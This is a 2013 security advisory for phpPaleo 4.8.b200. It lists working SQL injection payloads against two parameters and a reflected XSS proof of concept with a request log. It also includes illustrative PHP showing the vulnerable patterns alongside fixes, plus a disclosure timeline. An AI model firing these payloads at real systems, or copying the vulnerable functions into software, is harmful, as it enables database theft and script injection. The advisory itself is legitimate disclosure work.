Monday 21 January 2013

phpPaleo version 4.8.b200 - Multiple Vulnerabilities - CVE-2013-1403 and CVE-2013-1404

Overview

phpPaleo version 4.8.b200 is vulnerable to reflected Cross-Site Scripting (XSS) and to SQL injection (SQLi) against its MySQL backend that is exploitable through error-based, UNION-based and time-based blind techniques.

Software Description
phpPaleo 4 is an open source PHP project that manages a paleontological database.



Vulnerability Overview

Proof-of-concept requests for each vulnerability follow. The SQL injection entries are given in sqlmap-style report format (injection point, parameter, technique and payload); all requests were made against a local test instance at 127.0.0.1.

Structured Query Language Injection (SQLi)

http://127.0.0.1/phppaleo/search_biblio.php?

The HTTP GET parameter 'annee' is incorporated into the database query without sanitisation or parameterisation, so SQL supplied in the request is executed by the MySQL backend. The parameter sits in a numeric context, which is why the payloads below need no quote character to break out.

Place: GET
Parameter: annee
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: annee=2012 AND (SELECT 7789 FROM(SELECT COUNT(*),CONCAT(0x3a6466783a,(SELECT (CASE WHEN (7789=7789) THEN 1 ELSE 0 END)),0x3a7a636e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: annee=2012 LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6466783a,0x564b6151507148566f44,0x3a7a636e3a),NULL,NULL#&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: annee=2012 AND 3532=BENCHMARK(5000000,MD5(0x7148585a))&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1

http://127.0.0.1/phppaleo/search_espece.php?

The HTTP GET parameter 'texte' is incorporated into the database query without sanitisation or parameterisation, so SQL supplied in the request is executed by the MySQL backend. Unlike 'annee', this parameter is enclosed in quotes in the query, hence the leading single quote in the payloads below.

Place: GET
Parameter: texte
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: texte=' AND (SELECT 3222 FROM(SELECT COUNT(*),CONCAT(0x3a7166713a,(SELECT (CASE WHEN (3222=3222) THEN 1 ELSE 0 END)),0x3a786c683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: texte=' AND 2406=BENCHMARK(5000000,MD5(0x51704142))



Reflected Cross-Site Scripting

http://127.0.0.1/phppaleo/search_espece.php?


The HTTP GET parameter 'texte' is reflected into the HTML response without output encoding, so attacker-supplied markup is parsed, and any script in it executed, by the browser of whoever follows the crafted link.



19:43:31.002[8ms][total 8ms] Status: 200[OK]
GET http://127.0.0.1/phppaleo/search_espece.php?texte=%3Cscript%3Ealert(%27xss%27)%3C/script%3E Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1326] Mime Type[text/html]
Request Headers:
Host[127.0.0.1]
User-Agent[Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/17.0 Firefox/17.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Proxy-Connection[keep-alive]
Referer[http://127.0.0.1/phppaleo/menu.php]
Cookie[phppaleo4_lang=en; phppaleo4_options=geodesic%3Doff%3Bfile%3Dkml%3Bmap%3Dgoogle%3B; PHPSESSID=kkdavdn0nncu4eavqbq7oucsk1]
Response Headers:
Date[Sun, 09 Dec 2012 19:43:31 GMT]
Server[Apache/2.2.22 (Fedora)]
X-Powered-By[PHP/5.4.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Length[1326]
Connection[close]
Content-Type[text/html; charset=UTF-8]

XSS
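
The advisory does not include phpPaleo's source, so the PHP below is an added illustration of the two bug classes described above and of their fixes; it is not the project's code and is not taken from the remediated release. The table and column names (biblio, titre, auteur, annee, espece, nom, genre), the connection details and the function names are assumptions. The vulnerable functions concatenate the 'annee' and 'texte' parameters into SQL and echo 'texte' into HTML; the hardened ones validate the year, bind values through prepared statements, escape LIKE wildcards and HTML-encode the reflected term.

```php
<?php
// Added example for this advisory, not phpPaleo's source. Table and column
// names, the connection and the function names are assumptions used to
// show the vulnerable pattern and its fix.

// $db = new mysqli('127.0.0.1', 'user', 'password', 'phppaleo'); // placeholder

// --- Vulnerable pattern, as the 'annee' finding describes ---
function search_biblio_vulnerable(mysqli $db, string $annee): array
{
    // The GET value is concatenated into the statement, so
    // "2012 AND (SELECT ... INFORMATION_SCHEMA ...)", "2012 LIMIT 0,1 UNION ALL ..."
    // and "2012 AND 3532=BENCHMARK(...)" all run as SQL.
    $sql = "SELECT titre, auteur, annee FROM biblio WHERE annee = " . $annee;
    $res = $db->query($sql);
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

// --- Vulnerable pattern, as the 'texte' XSS finding describes ---
function render_results_vulnerable(string $texte): string
{
    // The search term is echoed into the HTML body unencoded, so
    // texte=<script>alert('xss')</script> is parsed as markup.
    return '<p>Results for: ' . $texte . '</p>';
}

// --- Hardened: validate, then bind ---
function search_biblio_safe(mysqli $db, string $annee): array
{
    // A publication year is a four-digit integer; reject anything else.
    if (!preg_match('/^\d{4}$/', $annee)) {
        return [];
    }
    // Prepared statement: the bound value is sent as data and can never
    // alter the statement's structure, which defeats error-, UNION- and
    // time-based injection alike.
    $stmt = $db->prepare('SELECT titre, auteur, annee FROM biblio WHERE annee = ?');
    $year = (int) $annee;
    $stmt->bind_param('i', $year);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

function search_espece_safe(mysqli $db, string $texte): array
{
    // Free text is bound as a LIKE pattern; escaping % and _ keeps the
    // user's wildcards from widening the match (MySQL's default escape is \).
    $pattern = '%' . addcslashes($texte, '%_\\') . '%';
    $stmt = $db->prepare('SELECT nom, genre FROM espece WHERE nom LIKE ?');
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// --- Hardened: encode for the HTML body context on output ---
function render_results_safe(string $texte): string
{
    // htmlspecialchars turns < > & " ' into entities, so the term is shown
    // as text instead of being parsed as markup.
    return '<p>Results for: '
        . htmlspecialchars($texte, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</p>';
}

// The page's XSS probe, through both renderers (no database needed):
$probe = "<script>alert('xss')</script>";
echo render_results_vulnerable($probe), PHP_EOL;
echo render_results_safe($probe), PHP_EOL;
```

Binding the value fixes all three sqlmap techniques at once, because a bound parameter can never change the statement's structure; the four-digit check on the year is defence in depth, not the fix itself. Independently of the query change, database error text should never reach the client, since the error-based technique above depends on MySQL's error message being included in the response. For the reflected parameter, the encoding has to match the output context: htmlspecialchars() is right for HTML body text, whereas a value placed inside a JavaScript string or a URL attribute needs the encoding for that context instead.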

Vulnerability Timeline

7 December 2012 - Developer contacted

9 December 2012 - Developer remediated the issues in phppaleo.4.10.b258.zip

21 January 2013 - MITRE assigned CVE-2013-1403 and CVE-2013-1404

21 January 2013 - MITRE advised to close CVE-2013-1403 and CVE-2013-1404

21 January 2013 - Vulnerabilities published.